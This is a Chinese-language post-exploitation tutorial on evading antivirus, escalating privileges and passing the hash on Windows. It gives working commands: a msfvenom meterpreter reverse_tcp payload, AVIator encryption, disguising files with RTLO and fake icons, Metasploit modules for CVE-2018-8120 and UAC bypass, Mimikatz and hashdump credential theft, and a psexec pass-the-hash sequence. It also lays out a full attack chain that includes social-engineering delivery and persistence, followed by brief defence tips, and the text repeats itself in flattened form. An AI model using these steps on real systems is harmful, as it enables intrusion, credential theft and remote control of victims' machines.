后渗透之免杀+提权 to Passing the Hash
字数 1367 2025-08-18 11:39:19

后渗透技术:免杀与提权实战指南

一、免杀技术基础

1.1 免杀概念

免杀(Anti-AntiVirus)是指绕过杀毒软件检测的技术,使恶意程序不被安全软件识别和拦截。

1.2 杀毒软件检测机制

杀毒软件主要通过以下几种方式检测恶意程序:

扫描技术

  • 压缩包扫描
  • 程序篡改防护
  • 文件修复
  • 急救盘杀毒
  • 智能扫描(关键位置)
  • 全盘扫描
  • 勒索软件防护
  • 开机扫描

监控技术

  • 内存监控
  • 文件监控
  • 邮件监控
  • 网页防护
  • 行为防护

扫描引擎

  1. 特征码扫描

    • 机制:比对病毒特征库
    • 特征码类型:
      • 文件特征码(单一/复合)
      • 内存特征码(单一/复合)
    • 优点:速度快,准确率高
    • 缺点:无法检测新病毒,需持续更新特征库

  2. 文件校验和法

    • 通过计算文件校验和检测修改

  3. 进程行为监测法(沙盒模式)

    • 监控可疑行为
    • 优点:可发现未知病毒
    • 缺点:可能误报

  4. 主动防御技术

    • 基于行为分析而非特征码

  5. 机器学习识别技术

    • 结合静态二进制分析和动态行为分析

二、AVIator免杀工具实战

2.1 AVIator简介

AVIator是一款使用AES加密shellcode的免杀工具,通过加密有效负载并使用各种注入技术绕过检测。

2.2 安装与使用

  1. 下载:

    git clone https://github.com/Ch0pin/AVIator

    或直接下载压缩包:

    https://github.com/Ch0pin/AVIator/archive/master.zip

  2. 生成shellcode:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f csharp -o payload.txt

  3. 使用AVIator:

    • 填入生成的shellcode
    • 使用默认AES KEY和IV
    • 点击"Encrypt"生成加密payload
    • 选择注入技术(默认进程注入)
    • 设置输出路径
    • 点击"Generate"生成免杀exe

2.3 免杀效果增强技巧

  • 使用RTLO(Right-to-Left Override)技术伪装文件扩展名
  • 自定义ico图标
  • 伪装成常见文件类型(doc、txt等)

三、权限提升技术

3.1 基础提权方法

  1. 使用漏洞提权(如CVE-2018-8120)

    use exploit/windows/local/ms18_8120_win32k_privesc
set SESSION [session_id]
exploit

  2. Meterpreter内置提权

    getsystem

3.2 绕过UAC提权

当UAC开启时,可使用bypassuac模块:

use exploit/windows/local/bypassuac
set SESSION [session_id]
exploit

四、哈希传递攻击(Pass-the-Hash)

4.1 获取哈希方法

  1. 使用Mimikatz

    load mimikatz
msv

  2. 使用Metasploit模块

    run post/windows/gather/smart_hashdump

    哈希格式:用户名:rid:LM-Hash:NTLM-Hash

4.2 哈希传递实战

使用psexec模块进行哈希传递:

use exploit/windows/smb/psexec
set RHOST [target_ip]
set SMBUser [username]
set SMBPass [NTLM_hash]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your_ip]
set LPORT [listening_port]
exploit

五、完整攻击流程总结

  1. 生成免杀payload

    • 使用AVIator等工具处理原始payload

  2. 建立初始访问

    • 通过社会工程等方式投递免杀程序
    • 获取初始meterpreter会话

  3. 权限提升

    • 尝试getsystem
    • 使用漏洞提权模块
    • 必要时绕过UAC

  4. 凭证获取

    • 使用mimikatz或hashdump获取哈希
    • 提取NTLM哈希

  5. 横向移动

    • 使用哈希传递技术获取其他系统访问权限
    • 通过psexec等模块建立新会话

  6. 权限维持

    • 创建持久化后门
    • 建立多个访问通道

六、防御建议

  1. 对抗免杀

    • 使用多引擎扫描
    • 部署行为分析系统
    • 启用内存保护

  2. 防止提权

    • 及时安装系统补丁
    • 保持UAC开启
    • 限制管理员权限

  3. 防范哈希传递

    • 启用Credential Guard(Windows 10+)
    • 限制本地管理员账户使用
    • 实施LAPS(本地管理员密码解决方案)

  4. 整体防御

    • 实施最小权限原则
    • 启用日志审计
    • 部署EDR解决方案

通过理解这些攻击技术,安全人员可以更好地构建防御策略,而渗透测试人员可以更全面地评估系统安全性。

后渗透技术:免杀与提权实战指南 一、免杀技术基础 1.1 免杀概念 免杀(Anti-AntiVirus)是指绕过杀毒软件检测的技术,使恶意程序不被安全软件识别和拦截。 1.2 杀毒软件检测机制 杀毒软件主要通过以下几种方式检测恶意程序: 扫描技术 压缩包扫描 程序篡改防护 文件修复 急救盘杀毒 智能扫描(关键位置) 全盘扫描 勒索软件防护 开机扫描 监控技术 内存监控 文件监控 邮件监控 网页防护 行为防护 扫描引擎 特征码扫描 机制:比对病毒特征库 特征码类型: 文件特征码(单一/复合) 内存特征码(单一/复合) 优点:速度快,准确率高 缺点:无法检测新病毒,需持续更新特征库 文件校验和法 通过计算文件校验和检测修改 进程行为监测法(沙盒模式) 监控可疑行为 优点:可发现未知病毒 缺点:可能误报 主动防御技术 基于行为分析而非特征码 机器学习识别技术 结合静态二进制分析和动态行为分析 二、AVIator免杀工具实战 2.1 AVIator简介 AVIator是一款使用AES加密shellcode的免杀工具,通过加密有效负载并使用各种注入技术绕过检测。 2.2 安装与使用 下载: 或直接下载压缩包: 生成shellcode: 使用AVIator: 填入生成的shellcode 使用默认AES KEY和IV 点击"Encrypt"生成加密payload 选择注入技术(默认进程注入) 设置输出路径 点击"Generate"生成免杀exe 2.3 免杀效果增强技巧 使用RTLO(Right-to-Left Override)技术伪装文件扩展名 自定义ico图标 伪装成常见文件类型(doc、txt等) 三、权限提升技术 3.1 基础提权方法 使用漏洞提权(如CVE-2018-8120) Meterpreter内置提权 3.2 绕过UAC提权 当UAC开启时,可使用bypassuac模块: 四、哈希传递攻击(Pass-the-Hash) 4.1 获取哈希方法 使用Mimikatz 使用Metasploit模块 哈希格式: 用户名:rid:LM-Hash:NTLM-Hash 4.2 哈希传递实战 使用psexec模块进行哈希传递: 五、完整攻击流程总结 生成免杀payload 使用AVIator等工具处理原始payload 建立初始访问 通过社会工程等方式投递免杀程序 获取初始meterpreter会话 权限提升 尝试getsystem 使用漏洞提权模块 必要时绕过UAC 凭证获取 使用mimikatz或hashdump获取哈希 提取NTLM哈希 横向移动 使用哈希传递技术获取其他系统访问权限 通过psexec等模块建立新会话 权限维持 创建持久化后门 建立多个访问通道 六、防御建议 对抗免杀 使用多引擎扫描 部署行为分析系统 启用内存保护 防止提权 及时安装系统补丁 保持UAC开启 限制管理员权限 防范哈希传递 启用Credential Guard(Windows 10+) 限制本地管理员账户使用 实施LAPS(本地管理员密码解决方案) 整体防御 实施最小权限原则 启用日志审计 部署EDR解决方案 通过理解这些攻击技术,安全人员可以更好地构建防御策略,而渗透测试人员可以更全面地评估系统安全性。